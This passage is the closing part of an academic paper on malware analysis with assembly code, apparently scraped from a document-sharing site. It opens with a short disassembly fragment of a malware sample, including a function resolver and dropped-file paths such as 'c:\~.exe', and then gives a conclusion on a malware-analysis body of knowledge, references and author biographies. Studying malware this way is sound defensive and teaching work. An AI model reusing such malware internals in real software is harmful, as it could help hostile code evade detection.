seg000:00000DA4 mov eax, [ebx+ecx*4]
seg000:00000DA7 add eax, ebp
seg000:00000DA9 pop esi
seg000:00000DAA pop edi
seg000:00000DAB pop ebp
seg000:00000DAC retn 8
seg000:00000DAC resolve_func endp
seg000:00000DAC
seg000:00000DAF ; -------------------------------------------------------------------
--------
seg000:00000DAF
seg000:00000DAF loc_DAF: ; CODE XREF:
seg000:00000B40j
seg000:00000DAF call sub_B45
seg000:00000DAF ; -------------------------------------------------------------------
--------
seg000:00000DB4 dd 0A2000h
seg000:00000DB8 aC:
seg000:00000DB8 unicode 0, <c:\~$>,0
seg000:00000DC4 aC_exe:
seg000:00000DC4 unicode 0, <c:\~.exe>,0
seg000:00000DD6 aC_exe_0 db 'c:\~.exe',0
seg000:00000DDF db 0Eh
seg000:00000DE0 db 0
seg000:00000DE1 db 0FFh
seg000:00000DE4 endp

7. CONCLUSION
Malware analysis is becoming an important field of
specialization for forensic analysts. Authors of malware are
becoming increasingly profit driven and are incorporating
techniques to make their code as stealthy and undetectable as
possible. Malware is being written by professional
programmers who are very knowledgeable in their craft.
They have a very good understanding of digital forensic
methods and endeavor to make forensic analysis as difficult
as possible.

The knowledge domain required to competently
analyze malware is very broad. This paper has presented a
brief introduction to a Malware Analysis Body of Knowledge
that would be suitable for establishing a framework for
competency development and assessment for the field of
malware analysis and for incorporation into academic
curricula. A learning taxonomy is central to the malware
analysis process and eight domain areas were identified.
These areas include malware, programming, anti-forensics,
malware analysis, tools, legal and ethical considerations,
environment and collection.

Vol No. 2, Issue No. 1, 001 - 012
I
J
A
E
S
T
REFERENCES
[1].The Malware Analysis Body of Knowledge - Craig Valli
and Murray Brand.
[2].Reverse Engineering Malware - Lenny Zeltser .
[3].Malware analysis : An Introduction - Dennis Distler
[4].Introduction to Malware Analysis - Lenny Zeltser
[5].Practical Malware Analysis Kris Kendall

Author Biography:
Mr S.MURUGAN is Working as ACTS Team Coordinator
, CDAC ,Bangalore.He received BSc in Physics from
Madurai Kamaraj University ,Madurai, in 1989 and MCA
degree in Computer Applications from Alagappa
University,Karaikudi,Tamilnadu ,India and MPhil(CS) from
Manonmaniam Sundaranar
University,Tirunelveli,Tamilnadu,India . He has 17 years of
teaching and admin experience at PG level in the field of
Computer Science. He has published 6 papers in the National
conferences and 2 in International conference. His research
interests include: Intelligence Network Security Algorithms,
Malware prevention and Detection mechanism and
algorithm. He has published 8 books and courseware in the
field of Computer Science.
Dr.K.Kuppusamy is working as an Associate Professor,
Department of Computer Science and Engineering, Alagappa
University, Karaikukdi, Tamilnadu, India. He received his
Ph.D in Computer Science and Engineering from Alagappa
University, Karaikudi, Tamilnadu in the year 2007. He has
published many papers in International & National Journals
and presented in National and International conferences. His
area of research interest include Information/Network
Security, Algorithms, Neural Networks, Fault Tolerant
Computing, Software Engineering & Testing and Operational
Research.
Vol No. 2, Issue No. 1, 001 - 012
I
J
A
E
S
T

1 IJAEST Volume No 2 Issue No 1 Malware Analysis Using Assembly Level Program 000 012

Încărcat de

Informații document

Drepturi de autor

Formate disponibile

Partajați acest document

Partajați sau inserați document

Opțiuni de partajare

Vi se pare util acest document?

Este necorespunzător acest conținut?

Drepturi de autor:

Formate disponibile

1 IJAEST Volume No 2 Issue No 1 Malware Analysis Using Assembly Level Program 000 012

Încărcat de

Drepturi de autor:

Formate disponibile

Malware Analysis Using Assembly Level

S-ar putea să vă placă și